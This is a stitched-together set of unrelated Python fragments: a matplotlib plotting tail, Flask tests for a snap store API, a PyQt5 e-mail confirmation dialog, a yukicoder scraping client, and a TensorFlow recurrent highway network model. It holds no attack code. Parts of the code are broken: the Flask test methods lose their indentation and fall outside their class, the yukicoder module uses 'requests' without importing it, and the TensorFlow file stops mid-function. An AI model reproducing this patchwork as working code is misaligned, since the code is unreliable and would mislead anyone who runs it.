    line3 = Line2D([], [], marker='x', color='r', linewidth=0, markeredgewidth=2)
    prop = matplotlib.font_manager.FontProperties(size='small')
    # fixed: pass loc as a keyword — positional loc was deprecated and then
    # removed from figlegend in modern Matplotlib
    figlegend((line1, line2, line3), ('Response Time', 'Throughput', 'Failures (50x)'),
              loc='lower center', prop=prop, ncol=3)
    # Write the PNG file named after the sample label
    savefig(label)
|
import store
import unittest
from flask import json
class StoreTestCase(unittest.TestCase):
    """HTTP-level tests for the snap store Flask app in `store`."""

    def setUp(self):
        # TODO: setup fixture data, test revision bumps
        store.app.config['TESTING'] = True
        self.c = store.app.test_client()
        # headers snapd sends; some endpoints require them
        self.headers = {
            'X-Ubuntu-Series': 16,
            'X-Ubuntu-Architecture': 'amd64'
        }

    def tearDown(self):
        # nothing to clean up yet
        pass
def test_hello(self):
r = self.c.get('/')
assert 'Hello' in r.data
def test_details_ok(self):
''' snap install bar '''
r = self.c.get('/api/v1/snaps/details/bar')
j = json.loads(r.data)
assert j['package_name'] == 'bar'
def test_details_empty(self):
''' snap install xyzzy '''
r = self.c.get('/api/v1/snaps/details/xyzzy', headers=self.headers)
j = json.loads(r.data)
assert 'No such package' in j['errors']
def test_search_old_install_path(self):
''' snap install bar (<= snapd 2.0.??) '''
r = self.c.get('/api/v1/search?q=package_name:"bar"')
j = json.loads(r.data)
assert j['_embedded']['clickindex:package'][0]['package_name'] == 'bar'
def test_search_all(self):
''' snap find '''
r = self.c.get('/api/v1/search?q=')
j = json.loads(r.data)
assert len(j['_embedded']['clickindex:package']) == 3
def test_search_partial(self):
''' snap find ba '''
r = self.c.get('/api/v1/search?q=ba')
j = json.loads(r.data)
assert len(j['_embedded']['clickindex:package']) == 2
def test_search_exact(self):
''' snap find foobar25 '''
r = self.c.get('/api/v1/search?q=foobar25')
j = json.loads(r.data)
assert j['_embedded']['clickindex:package'][0]['package_name'] == 'foobar25'
def test_metadata_local(self):
''' snap refresh (>= snapd 2.0.??)
with only snaps from our local repo '''
r = self.c.post('/api/v1/snaps/metadata',
data=json.dumps({'snaps': [
{'snap_id': 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxbar',
'revision': 1, 'confinement': 'strict'}],
"fields": ["download_url", "revision"]}),
headers=self.headers)
j = json.loads(r.data)
assert len(j['_embedded']['clickindex:package']) == 1
def test_metadata_remote(self):
''' snap refresh (>= snapd 2.0.??)
with only snaps from upstream repo '''
r = self.c.post('/api/v1/snaps/metadata',
data=json.dumps({'snaps': [
{'snap_id': 'mVyGrEwiqSi5PugCwyH7WgpoQLemtTd6',
'revision': 1, 'confinement': 'strict'}],
"fields": ["download_url", "revision"]}),
headers=self.headers)
j = json.loads(r.data)
assert len(j['_embedded']['clickindex:package']) == 1
def test_metadata_mixed(self):
''' snap refresh (>= snapd 2.0.??)
with snaps from both local and remote '''
r = self.c.post('/api/v1/snaps/metadata',
data=json.dumps({'snaps': [
{'snap_id': 'mVyGrEwiqSi5PugCwyH7WgpoQLemtTd6',
'revision': 1, 'confinement': 'strict'},
{'snap_id': 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxbar',
'revision': 1, 'confinement': 'strict'}
],
"fields": ["download_url", "revision"]}),
headers=self.headers)
j = json.loads(r.data)
assert len(j['_embedded']['clickindex:package']) == 2
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'C:\Users\conta\Documents\script\Wizard\App\work\ui_files\email_confirm_dialog.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
    """Qt Designer-generated layout for the e-mail verification dialog.

    NOTE(review): this file is generated from email_confirm_dialog.ui and will
    be overwritten on regeneration; the wording fixes in retranslateUi below
    should also be applied to the .ui source file.
    """

    def setupUi(self, Dialog):
        """Build the widget tree on *Dialog* and wire basic signals."""
        Dialog.setObjectName("Dialog")
        Dialog.resize(327, 304)
        self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)
        self.verticalLayout.setObjectName("verticalLayout")
        self.frame = QtWidgets.QFrame(Dialog)
        self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame.setObjectName("frame")
        self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.frame)
        self.verticalLayout_2.setObjectName("verticalLayout_2")
        self.confirm_email_title_label = QtWidgets.QLabel(self.frame)
        self.confirm_email_title_label.setObjectName("confirm_email_title_label")
        self.verticalLayout_2.addWidget(self.confirm_email_title_label)
        self.formLayout = QtWidgets.QFormLayout()
        self.formLayout.setObjectName("formLayout")
        self.verification_lineEdit = QtWidgets.QLineEdit(self.frame)
        self.verification_lineEdit.setFocusPolicy(QtCore.Qt.WheelFocus)
        self.verification_lineEdit.setObjectName("verification_lineEdit")
        self.formLayout.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.verification_lineEdit)
        self.label_2 = QtWidgets.QLabel(self.frame)
        self.label_2.setObjectName("label_2")
        self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label_2)
        self.verticalLayout_2.addLayout(self.formLayout)
        spacerItem = QtWidgets.QSpacerItem(20, 34, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout_2.addItem(spacerItem)
        self.confirm_pushButton = QtWidgets.QPushButton(self.frame)
        self.confirm_pushButton.setMinimumSize(QtCore.QSize(0, 70))
        self.confirm_pushButton.setMaximumSize(QtCore.QSize(16777215, 70))
        self.confirm_pushButton.setObjectName("confirm_pushButton")
        self.verticalLayout_2.addWidget(self.confirm_pushButton)
        self.recover_pushButton = QtWidgets.QPushButton(self.frame)
        self.recover_pushButton.setObjectName("recover_pushButton")
        self.verticalLayout_2.addWidget(self.recover_pushButton)
        self.verticalLayout.addWidget(self.frame)
        self.log_frame = QtWidgets.QFrame(Dialog)
        self.log_frame.setObjectName("log_frame")
        self.log_layout = QtWidgets.QHBoxLayout(self.log_frame)
        self.log_layout.setContentsMargins(0, 0, 0, 0)
        self.log_layout.setSpacing(0)
        self.log_layout.setObjectName("log_layout")
        self.log_lineEdit = QtWidgets.QLineEdit(self.log_frame)
        self.log_lineEdit.setReadOnly(True)
        self.log_lineEdit.setObjectName("log_lineEdit")
        self.log_layout.addWidget(self.log_lineEdit)
        self.verticalLayout.addWidget(self.log_frame)
        self.retranslateUi(Dialog)
        # "I didn't receive this email" cancels the dialog so the caller can
        # re-prompt for a different address.
        self.recover_pushButton.clicked.connect(Dialog.reject)
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def retranslateUi(self, Dialog):
        """Set all user-visible strings (translatable)."""
        _translate = QtCore.QCoreApplication.translate
        Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
        # Bug fix: corrected user-facing grammar ("Your received" -> "You
        # received", "I don't receive" -> "I didn't receive").
        self.confirm_email_title_label.setText(_translate("Dialog", "You received a code by email"))
        self.label_2.setText(_translate("Dialog", "Verification code"))
        self.confirm_pushButton.setText(_translate("Dialog", "Confirm"))
        self.recover_pushButton.setText(_translate("Dialog", "I didn\'t receive this email, change email"))
        self.log_lineEdit.setPlaceholderText(_translate("Dialog", "Warnings and logs here..."))
if __name__ == "__main__":
    # Manual preview harness: build the dialog and run the Qt event loop.
    import sys

    app = QtWidgets.QApplication(sys.argv)
    dialog = QtWidgets.QDialog()
    form = Ui_Dialog()
    form.setupUi(dialog)
    dialog.show()
    sys.exit(app.exec_())
|
<filename>onlinejudge/service/yukicoder.py
# Python Version: 3.x
# -*- coding: utf-8 -*-
"""
the module for yukicoder (https://yukicoder.me/)
:note: There is the official API https://petstore.swagger.io/?url=https://yukicoder.me/api/swagger.yaml
"""
import json
import posixpath
import urllib.parse
from typing import *
import bs4
import onlinejudge._implementation.logging as log
import onlinejudge._implementation.testcase_zipper
import onlinejudge._implementation.utils as utils
import onlinejudge.dispatch
from onlinejudge.type import *
class YukicoderService(onlinejudge.type.Service):
    """Service object for yukicoder (https://yukicoder.me/).

    Mixes calls to the official JSON API with screen-scraping of HTML tables.
    """

    def get_url_of_login_page(self):
        # Login happens via OAuth from the top page; there is no dedicated form URL.
        return self.get_url()

    def is_logged_in(self, *, session: Optional[requests.Session] = None, method: Optional[str] = None) -> bool:
        """Return True when *session* is already authenticated.

        Requests the GitHub OAuth endpoint without following redirects: a
        logged-in session is redirected somewhere that is not the OAuth flow.
        """
        session = session or utils.get_default_session()
        url = 'https://yukicoder.me/auth/github'
        resp = utils.request('GET', url, session=session, allow_redirects=False)
        assert resp.status_code == 302
        return 'oauth' not in resp.headers['Location']

    def get_url(self) -> str:
        return 'https://yukicoder.me/'

    def get_name(self) -> str:
        return 'yukicoder'

    @classmethod
    def from_url(cls, url: str) -> Optional['YukicoderService']:
        """Return a service instance for yukicoder URLs, else None."""
        # example: http://yukicoder.me/
        result = urllib.parse.urlparse(url)
        if result.scheme in ('', 'http', 'https') \
                and result.netloc == 'yukicoder.me':
            return cls()
        return None

    def _issue_official_api(self, api: str, id: Optional[int] = None, name: Optional[str] = None, *, session: Optional[requests.Session] = None) -> Any:
        """Call official API endpoint *api* for a user given by *id* xor *name*.

        Returns the decoded JSON, or None when the request fails (e.g. the
        user does not exist).
        """
        # Exactly one of id / name must be supplied.
        assert (id is not None) != (name is not None)
        if id is not None:
            assert isinstance(id, int)
            # NOTE(review): "sometihng" is a typo of "something"; local name
            # only, so it is harmless to behavior.
            sometihng = {'user': '', 'solved': 'id/'}[api]
            url = 'https://yukicoder.me/api/v1/{}/{}{}'.format(api, sometihng, id)
        else:
            assert name is not None
            url = 'https://yukicoder.me/api/v1/{}/name/{}'.format(api, urllib.parse.quote(name))
        session = session or utils.get_default_session()
        try:
            resp = utils.request('GET', url, session=session)
        except requests.exceptions.HTTPError:
            # The body should contain a JSON error message ("the specified
            # user does not exist", in Japanese), but we collapse it to None.
            return None
        return json.loads(resp.content.decode(resp.encoding))

    # example: {"Id":10,"Name":"yuki2006","Solved":280,"Level":34,"Rank":59,"Score":52550,"Points":7105,"Notice":"匿名ユーザーの情報は取れません。ユーザー名が重複している場合は最初に作られたIDが優先されます(その場合は運営にご報告いただければマージします)。このAPIはベータ版です。予告なく変更される場合があります。404を返したら廃止です。"}
    def get_user(self, *args, **kwargs) -> Dict[str, Any]:
        """Fetch a user's profile via the official API.

        .. deprecated:: 6.0.0
            This method may be deleted in future.
        """
        return self._issue_official_api('user', *args, **kwargs)

    # https://twitter.com/yukicoder/status/935943170210258944
    # example: [{"No":46,"ProblemId":43,"Title":"はじめのn歩","AuthorId":25,"TesterId":0,"Level":1,"ProblemType":0,"Tags":"実装"}]
    def get_solved(self, *args, **kwargs) -> List[Dict[str, Any]]:
        """Fetch a user's solved problems via the official API.

        .. deprecated:: 6.0.0
            This method may be deleted in future.
        """
        return self._issue_official_api('solved', *args, **kwargs)

    # example: https://yukicoder.me/users/237/favorite
    def get_user_favorite(self, id: int, *, session: Optional[requests.Session] = None) -> List[Any]:
        """Scrape the "favorite submissions" table of user *id*.

        .. deprecated:: 6.0.0
            This method may be deleted in future.
        """
        url = 'https://yukicoder.me/users/%d/favorite' % id
        columns, rows = self._get_and_parse_the_table(url, session=session)
        # Japanese headers: [#, submit time, submitter, problem, language,
        # result, running time, code length].
        assert columns == ['#', '提出時間', '提出者', '問題', '言語', '結果', '実行時間', 'コード長']
        for row in rows:
            for column in columns:
                # Keep the link target (if any) under "<column>/url".
                if row[column].find('a'):
                    row[column + '/url'] = row[column].find('a').attrs.get('href')
                if column == '#':
                    row[column] = int(row[column].text)
                else:
                    row[column] = row[column].text.strip()
        return rows

    # example: https://yukicoder.me/users/504/favoriteProblem
    def get_user_favorite_problem(self, id, session: Optional[requests.Session] = None) -> List[Any]:
        """Scrape the "favorite problems" table of user *id*.

        .. deprecated:: 6.0.0
            This method may be deleted in future.
        """
        url = 'https://yukicoder.me/users/%d/favoriteProblem' % id
        columns, rows = self._get_and_parse_the_table(url, session=session)
        # Japanese headers: [number, title, level, tags, time limit,
        # memory limit, author].
        assert columns == ['ナンバー', '問題名', 'レベル', 'タグ', '時間制限', 'メモリ制限', '作問者']
        for row in rows:
            for column in columns:
                if row[column].find('a'):
                    row[column + '/url'] = row[column].find('a').attrs.get('href')
                if column == 'ナンバー':
                    row[column] = int(row[column].text)
                elif column == 'レベル':
                    row[column] = self._parse_star(row[column])
                elif column == 'タグ':
                    # NOTE: as of 2017-11-01, tags are hidden unless practice mode is relaxed, even for solved problems
                    # NOTE: tags are hidden unless logged in
                    # NOTE: if you are logged in but a GET via requests still returns no tags, check that an appropriate Session object is being passed
                    row[column] = row[column].text.strip().split()
                else:
                    row[column] = row[column].text.strip()
        return rows

    # example: https://yukicoder.me/users/1786/favoriteWiki
    def get_user_favorite_wiki(self, id: int, *, session: Optional[requests.Session] = None) -> List[Any]:
        """Scrape the "favorite wiki pages" table of user *id*.

        .. deprecated:: 6.0.0
            This method may be deleted in future.
        """
        url = 'https://yukicoder.me/users/%d/favoriteWiki' % id
        columns, rows = self._get_and_parse_the_table(url, session=session)
        assert columns == ['Wikiページ']
        for row in rows:
            for column in columns:
                row[column + '/url'] = row[column].find('a').attrs.get('href')
                row[column] = row[column].text.strip()
        return rows

    # example: https://yukicoder.me/submissions?page=4220
    # example: https://yukicoder.me/submissions?page=2192&status=AC
    # NOTE: reads only a single page; callers must loop if they want everything
    def get_submissions(self, *, page: int, status: Optional[str] = None, session: Optional[requests.Session] = None) -> List[Any]:
        """Scrape one page of the global submission list.

        .. deprecated:: 6.0.0
            This method may be deleted in future.
        """
        assert isinstance(page, int) and page >= 1
        url = 'https://yukicoder.me/submissions?page=%d' % page
        if status is not None:
            assert status in 'AC WA RE TLE MLE OLE J_TLE CE WJ Judge NoOut IE'.split()
            url += '&status=' + status
        columns, rows = self._get_and_parse_the_table(url, session=session)
        assert columns == ['#', '提出日時', '', '提出者', '問題', '言語', '結果', '実行時間', 'コード長']  # the blank header is the magnifying-glass column ("show this user's submissions")
        for row in rows:
            for column in columns:
                if column and row[column].find('a'):
                    row[column + '/url'] = row[column].find('a').attrs.get('href')
                if column == '#':
                    row[column] = int(row[column].text)
                elif column == '':
                    del row[column]
                else:
                    row[column] = row[column].text.strip()
        return rows

    # example: https://yukicoder.me/problems?page=2
    # NOTE: when logged in (original note truncated here)
    def get_problems(self, *, page: int, comp_problem: bool = True, other: bool = False, sort: Optional[str] = None, session: Optional[requests.Session] = None) -> List[Any]:
        """Scrape one page of the problem list.

        .. deprecated:: 6.0.0
            This method may be deleted in future.
        """
        assert isinstance(page, int) and page >= 1
        url = 'https://yukicoder.me/problems'
        if other:
            url += '/other'
        url += '?page=%d' % page
        if comp_problem:  # incomplete problems are excluded by default (even when logged in)
            url += '&comp_problem=on'
        if sort is not None:
            assert sort in (
                'no_asc',
                'level_asc',
                'level_desc',
                'solved_asc',
                'solved_desc',
                'fav_asc',
                'fav_desc',
            )
            url += '&sort=' + sort
        columns, rows = self._get_and_parse_the_table(url, session=session)
        # Japanese headers: [number, title, level, tags, author, solved count, Fav].
        assert columns == ['ナンバー', '問題名', 'レベル', 'タグ', '作問者', '解いた人数', 'Fav']
        for row in rows:
            for column in columns:
                if column and row[column].find('a'):
                    row[column + '/url'] = row[column].find('a').attrs.get('href')
                if column in ('ナンバー', '解いた人数', 'Fav'):
                    row[column] = int(row[column].text)
                elif column == 'レベル':
                    row[column] = self._parse_star(row[column])
                elif column == 'タグ':
                    # NOTE: tags are hidden unless logged in
                    # NOTE: if you are logged in but a GET via requests still returns no tags, check that an appropriate Session object is being passed
                    row[column] = row[column].text.strip().split()
                else:
                    row[column] = row[column].text.strip()
        return rows

    def _get_and_parse_the_table(self, url: str, *, session: Optional[requests.Session] = None) -> Tuple[List[Any], List[Dict[str, bs4.Tag]]]:
        """Fetch *url* and parse its single HTML table.

        Returns (column headers, rows); each row maps a header to the raw
        <td> tag for the caller to post-process.
        """
        # get
        session = session or utils.get_default_session()
        resp = utils.request('GET', url, session=session)
        # parse
        soup = bs4.BeautifulSoup(resp.content.decode(resp.encoding), utils.html_parser)
        assert len(soup.find_all('table')) == 1
        table = soup.find('table')
        columns = [th.text.strip() for th in table.find('thead').find('tr') if th.name == 'th']
        data = []  # type: List[Dict[str, List[str]]]
        for row in table.find('tbody').find_all('tr'):
            values = [td for td in row if td.name == 'td']
            assert len(columns) == len(values)
            data += [dict(zip(columns, values))]
        return columns, data

    def _parse_star(self, tag: bs4.Tag) -> str:
        """Convert a star-rating widget into a string like "2" or "2.5"."""
        star = str(len(tag.find_all(class_='fa-star')))
        if tag.find_all(class_='fa-star-half-full'):
            star += '.5'
        return star
class YukicoderProblem(onlinejudge.type.Problem):
    """A single yukicoder problem, identified by problem number or internal ID."""

    def __init__(self, *, problem_no=None, problem_id=None):
        # At least one identifier is required; both must be ints when given.
        assert problem_no or problem_id
        assert not problem_no or isinstance(problem_no, int)
        assert not problem_id or isinstance(problem_id, int)
        self.problem_no = problem_no
        self.problem_id = problem_id

    def download_sample_cases(self, *, session: Optional[requests.Session] = None) -> List[TestCase]:
        """Scrape the sample inputs/outputs from the problem page."""
        session = session or utils.get_default_session()
        # get
        resp = utils.request('GET', self.get_url(), session=session)
        # parse
        soup = bs4.BeautifulSoup(resp.content.decode(resp.encoding), utils.html_parser)
        samples = onlinejudge._implementation.testcase_zipper.SampleZipper()
        for pre in soup.select('.sample pre'):
            log.debug('pre: %s', str(pre))
            it = self._parse_sample_tag(pre)
            if it is not None:
                data, name = it
                samples.add(data.encode(), name)
        return samples.get()

    def download_system_cases(self, *, session: Optional[requests.Session] = None) -> List[TestCase]:
        """Download the full system test cases as a zip (requires login).

        :raises NotLoggedInError:
        """
        session = session or utils.get_default_session()
        if not self.get_service().is_logged_in(session=session):
            raise NotLoggedInError
        url = 'https://yukicoder.me/problems/no/{}/testcase.zip'.format(self.problem_no)
        resp = utils.request('GET', url, session=session)
        fmt = 'test_%e/%s'
        return onlinejudge._implementation.testcase_zipper.extract_from_zip(resp.content, fmt)

    def _parse_sample_tag(self, tag: bs4.Tag) -> Optional[Tuple[str, str]]:
        """Return (content, name) for one sample <pre>, or None if not a sample."""
        assert isinstance(tag, bs4.Tag)
        assert tag.name == 'pre'
        prv = utils.previous_sibling_tag(tag)
        pprv = tag.parent and utils.previous_sibling_tag(tag.parent)
        # A sample <pre> sits in a div.paragraph preceded by an <h6>, whose
        # parent paragraph is itself preceded by an <h5> section title.
        if prv.name == 'h6' and tag.parent.name == 'div' and tag.parent['class'] == ['paragraph'] and pprv.name == 'h5':
            log.debug('h6: %s', str(prv))
            log.debug('name.encode(): %s', prv.string.encode())
            s = utils.parse_content(tag)
            return utils.textfile(s.lstrip()), pprv.string + ' ' + prv.string
        return None

    def submit_code(self, code: bytes, language_id: LanguageId, *, filename: Optional[str] = None, session: Optional[requests.Session] = None) -> onlinejudge.type.Submission:
        """Submit *code* to this problem.

        :raises NotLoggedInError: when the submit form is not available
        :raises SubmissionError: when the judge rejects the submission
        """
        session = session or utils.get_default_session()
        # get
        url = self.get_url() + '/submit'
        resp = utils.request('GET', url, session=session)
        # parse
        soup = bs4.BeautifulSoup(resp.content.decode(resp.encoding), utils.html_parser)
        form = soup.find('form', id='submit_form')
        if not form:
            log.error('form not found')
            raise NotLoggedInError
        # post
        form = utils.FormSender(form, url=resp.url)
        form.set('lang', language_id)
        form.set_file('file', filename or 'code', code)
        form.unset('custom_test')
        resp = form.request(session=session)
        resp.raise_for_status()
        # result: a successful submission redirects to its submission page
        if 'submissions' in resp.url:
            # example: https://yukicoder.me/submissions/314087
            log.success('success: result: %s', resp.url)
            return utils.DummySubmission(resp.url, problem=self)
        else:
            log.failure('failure')
            soup = bs4.BeautifulSoup(resp.content.decode(resp.encoding), utils.html_parser)
            for div in soup.findAll('div', attrs={'role': 'alert'}):
                log.warning('yukicoder says: "%s"', div.string)
            raise SubmissionError

    def get_available_languages(self, *, session: Optional[requests.Session] = None) -> List[Language]:
        """List the languages accepted for this problem."""
        session = session or utils.get_default_session()
        # get
        # We use the problem page since it is available without logging in
        resp = utils.request('GET', self.get_url(), session=session)
        # parse
        soup = bs4.BeautifulSoup(resp.content.decode(resp.encoding), utils.html_parser)
        select = soup.find('select', id='lang')
        languages = []  # type: List[Language]
        for option in select.find_all('option'):
            languages += [Language(option.attrs['value'], ' '.join(option.string.split()))]
        return languages

    def get_url(self) -> str:
        """Return the canonical URL, preferring the problem number form."""
        if self.problem_no:
            return 'https://yukicoder.me/problems/no/{}'.format(self.problem_no)
        elif self.problem_id:
            return 'https://yukicoder.me/problems/{}'.format(self.problem_id)
        else:
            raise ValueError

    @classmethod
    def from_url(cls, url: str) -> Optional['YukicoderProblem']:
        """Parse *url* into a YukicoderProblem, or return None for other URLs."""
        # example: https://yukicoder.me/problems/no/499
        # example: http://yukicoder.me/problems/1476
        result = urllib.parse.urlparse(url)
        dirname, basename = posixpath.split(utils.normpath(result.path))
        if result.scheme in ('', 'http', 'https') \
                and result.netloc == 'yukicoder.me':
            n = None  # type: Optional[int]
            try:
                n = int(basename)
            except ValueError:
                pass
            if n is not None:
                if dirname == '/problems/no':
                    return cls(problem_no=n)
                if dirname == '/problems':
                    return cls(problem_id=n)
        # Bug fix: this previously fell through to ``return cls()`` for other
        # yukicoder.me URLs, which trips the constructor's assertion
        # (``assert problem_no or problem_id``) and raised AssertionError
        # instead of signalling "not a problem URL" with None.
        return None

    def get_service(self) -> YukicoderService:
        return YukicoderService()

    def get_input_format(self, *, session: Optional[requests.Session] = None) -> Optional[str]:
        """Scrape the raw HTML of the input-format section, or None if absent."""
        session = session or utils.get_default_session()
        # get
        resp = utils.request('GET', self.get_url(), session=session)
        # parse
        soup = bs4.BeautifulSoup(resp.content.decode(resp.encoding), utils.html_parser)
        for h4 in soup.find_all('h4'):
            if h4.string == '入力':  # the section titled "Input"
                return h4.parent.find('pre').decode_contents(formatter=None)
        return None
# Register this service and problem class with the URL dispatcher so that
# onlinejudge.dispatch can resolve yukicoder URLs.
onlinejudge.dispatch.services += [YukicoderService]
onlinejudge.dispatch.problems += [YukicoderProblem]
|
from __future__ import absolute_import, division, print_function
import tensorflow as tf
import numpy as np
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.ops import math_ops, array_ops
from tensorflow.python.util import nest
from tensorflow.python.ops.nn import rnn_cell
# Shorthand alias for the base cell class from TensorFlow's (legacy) RNN API.
RNNCell = rnn_cell.RNNCell
class Model(object):
    """A Variational RHN model."""

    def __init__(self, is_training, config):
        # Shorthand copies of the configuration values used to build the graph.
        self.batch_size = batch_size = config.batch_size
        self.num_steps = num_steps = config.num_steps
        self.depth = depth = config.depth
        self.size = size = config.hidden_size
        self.num_layers = num_layers = config.num_layers
        vocab_size = config.vocab_size
        # Embedding width: a small vocabulary can use a narrower embedding,
        # unless weights are tied to the softmax (which needs the hidden size).
        if vocab_size < self.size and not config.tied:
            in_size = vocab_size
        else:
            in_size = self.size
        self.in_size = in_size
        # Placeholders for the data and for the per-batch "noise" masks
        # (variational dropout) applied to inputs, recurrent states, outputs.
        self._input_data = tf.placeholder(tf.int32, [batch_size, num_steps])
        self._targets = tf.placeholder(tf.int32, [batch_size, num_steps])
        self._noise_x = tf.placeholder(tf.float32, [batch_size, num_steps, 1])
        self._noise_i = tf.placeholder(tf.float32, [batch_size, in_size, num_layers])
        self._noise_h = tf.placeholder(tf.float32, [batch_size, size, num_layers])
        self._noise_o = tf.placeholder(tf.float32, [batch_size, 1, size])
        with tf.device("/cpu:0"):
            embedding = tf.get_variable("embedding", [vocab_size, in_size])
            inputs = tf.nn.embedding_lookup(embedding, self._input_data) * self._noise_x
        outputs = []
        self._initial_state = [0] * self.num_layers
        state = [0] * self.num_layers
        self._final_state = [0] * self.num_layers
        # Unroll each RHN layer over time; the output sequence of one layer
        # becomes the input sequence of the next.
        for l in range(config.num_layers):
            with tf.variable_scope('RHN' + str(l)):
                cell = RHNCell(size, in_size, is_training, depth=depth, forget_bias=config.init_bias)
                self._initial_state[l] = cell.zero_state(batch_size, tf.float32)
                # Per-layer state carries the dropout masks alongside the
                # recurrent state so the same masks are reused at every step.
                state[l] = [self._initial_state[l], self._noise_i[:, :, l], self._noise_h[:, :, l]]
                for time_step in range(num_steps):
                    if time_step > 0:
                        # Share weights across time steps.
                        tf.get_variable_scope().reuse_variables()
                    (cell_output, state[l]) = cell(inputs[:, time_step, :], state[l])
                    outputs.append(cell_output)
                inputs = tf.pack(outputs, axis=1)
                outputs = []
        output = tf.reshape(inputs * self._noise_o, [-1, size])
        # Tied embeddings reuse the (transposed) embedding matrix as softmax weights.
        softmax_w = tf.transpose(embedding) if config.tied else tf.get_variable("softmax_w", [size, vocab_size])
        softmax_b = tf.get_variable("softmax_b", [vocab_size])
        logits = tf.matmul(output, softmax_w) + softmax_b
        loss = tf.nn.seq2seq.sequence_loss_by_example(
            [logits],
            [tf.reshape(self._targets, [-1])],
            [tf.ones([batch_size * num_steps])])
        self._final_state = [s[0] for s in state]
        pred_loss = tf.reduce_sum(loss) / batch_size
        self._cost = cost = pred_loss
        if not is_training:
            return
        # Training-only graph: L2 weight decay, gradient clipping, plain SGD.
        tvars = tf.trainable_variables()
        l2_loss = tf.add_n([tf.nn.l2_loss(v) for v in tvars])
        self._cost = cost = pred_loss + config.weight_decay * l2_loss
        self._lr = tf.Variable(0.0, trainable=False)
        # Count (and print) the total number of trainable parameters.
        self._nvars = np.prod(tvars[0].get_shape().as_list())
        print(tvars[0].name, tvars[0].get_shape().as_list())
        for var in tvars[1:]:
            sh = var.get_shape().as_list()
            print(var.name, sh)
            self._nvars += np.prod(sh)
        print(self._nvars, 'total variables')
        grads, _ = tf.clip_by_global_norm(tf.gradients(cost, tvars),
                                          config.max_grad_norm)
        optimizer = tf.train.GradientDescentOptimizer(self.lr)
        self._train_op = optimizer.apply_gradients(zip(grads, tvars))

    def assign_lr(self, session, lr_value):
        # The learning-rate schedule is driven externally through this setter.
        session.run(tf.assign(self.lr, lr_value))

    # Read-only accessors for the graph tensors and ops built in __init__.
    @property
    def input_data(self):
        return self._input_data

    @property
    def targets(self):
        return self._targets

    @property
    def noise_x(self):
        return self._noise_x

    @property
    def noise_i(self):
        return self._noise_i

    @property
    def noise_h(self):
        return self._noise_h

    @property
    def noise_o(self):
        return self._noise_o

    @property
    def initial_state(self):
        return self._initial_state

    @property
    def cost(self):
        return self._cost

    @property
    def final_state(self):
        return self._final_state

    @property
    def lr(self):
        return self._lr

    @property
    def train_op(self):
        return self._train_op

    @property
    def nvars(self):
        return self._nvars
class RHNCell(RNNCell):
    """Variational Recurrent Highway Layer

    Reference: https://arxiv.org/abs/1607.03474
    """

    def __init__(self, num_units, in_size, is_training, depth=3, forget_bias=None):
        # depth: number of highway micro-steps per time step.
        # forget_bias: initial value for the transform-gate bias; None means
        # the variable's default initializer is used (see linear()).
        self._num_units = num_units
        self._in_size = in_size
        self.is_training = is_training
        self.depth = depth
        self.forget_bias = forget_bias

    @property
    def input_size(self):
        return self._in_size

    @property
    def output_size(self):
        return self._num_units

    @property
    def state_size(self):
        return self._num_units

    def __call__(self, inputs, state, scope=None):
        """Run one time step.

        *state* is [current_state, noise_i, noise_h]: the recurrent state plus
        the variational dropout masks for the inputs and the state, which are
        carried through so the same masks apply at every step.
        """
        current_state = state[0]
        noise_i = state[1]
        noise_h = state[2]
        for i in range(self.depth):
            # The external input feeds only the first micro-step; deeper
            # micro-steps transform the state alone.
            with tf.variable_scope('h_' + str(i)):
                if i == 0:
                    h = tf.tanh(linear([inputs * noise_i, current_state * noise_h], self._num_units, True))
                else:
                    h = tf.tanh(linear([current_state * noise_h], self._num_units, True))
            with tf.variable_scope('t_' + str(i)):
                if i == 0:
                    t = tf.sigmoid(linear([inputs * noise_i, current_state * noise_h], self._num_units, True, self.forget_bias))
                else:
                    t = tf.sigmoid(linear([current_state * noise_h], self._num_units, True, self.forget_bias))
            # Highway update: carry the old state, write h where the gate opens.
            current_state = (h - current_state) * t + current_state
        return current_state, [current_state, noise_i, noise_h]
def linear(args, output_size, bias, bias_start=None, scope=None):
    """
    Slightly modified version of the _linear helper used by TensorFlow's rnn;
    the only change is that bias_start may be None, in which case the bias
    variable falls back to its default initializer.

    Linear map: sum_i(args[i] * W[i]), where each W[i] is a newly created
    variable.

    Args:
      args: a 2D Tensor or a list of 2D, batch x n, Tensors.
      output_size: int, second dimension of W[i].
      bias: boolean, whether to add a bias term or not.
      bias_start: starting value to initialize the bias; default initializer
        when None.
      scope: VariableScope for the created subgraph; defaults to "Linear".

    Returns:
      A 2D Tensor with shape [batch x output_size] equal to
      sum_i(args[i] * W[i]).

    Raises:
      ValueError: if some of the arguments has unspecified or wrong shape.
    """
    # Normalize args to a non-empty list of tensors.
    if args is None or (nest.is_sequence(args) and not args):
        raise ValueError("`args` must be specified")
    if not nest.is_sequence(args):
        args = [args]

    # Validate that every input is 2D with a known second dimension, then
    # sum those dimensions to size the concatenated weight matrix.
    shapes = [a.get_shape().as_list() for a in args]
    for shape in shapes:
        if len(shape) != 2:
            raise ValueError("Linear is expecting 2D arguments: %s" % str(shapes))
        if not shape[1]:
            raise ValueError("Linear expects shape[1] of arguments: %s" % str(shapes))
    total_arg_size = sum(shape[1] for shape in shapes)
    dtype = args[0].dtype

    # Now the computation.
    with vs.variable_scope(scope or "Linear"):
        weight_matrix = vs.get_variable(
            "Matrix", [total_arg_size, output_size], dtype=dtype)
        if len(args) == 1:
            output = math_ops.matmul(args[0], weight_matrix)
        else:
            output = math_ops.matmul(array_ops.concat(1, args), weight_matrix)
        if not bias:
            return output
        if bias_start is None:
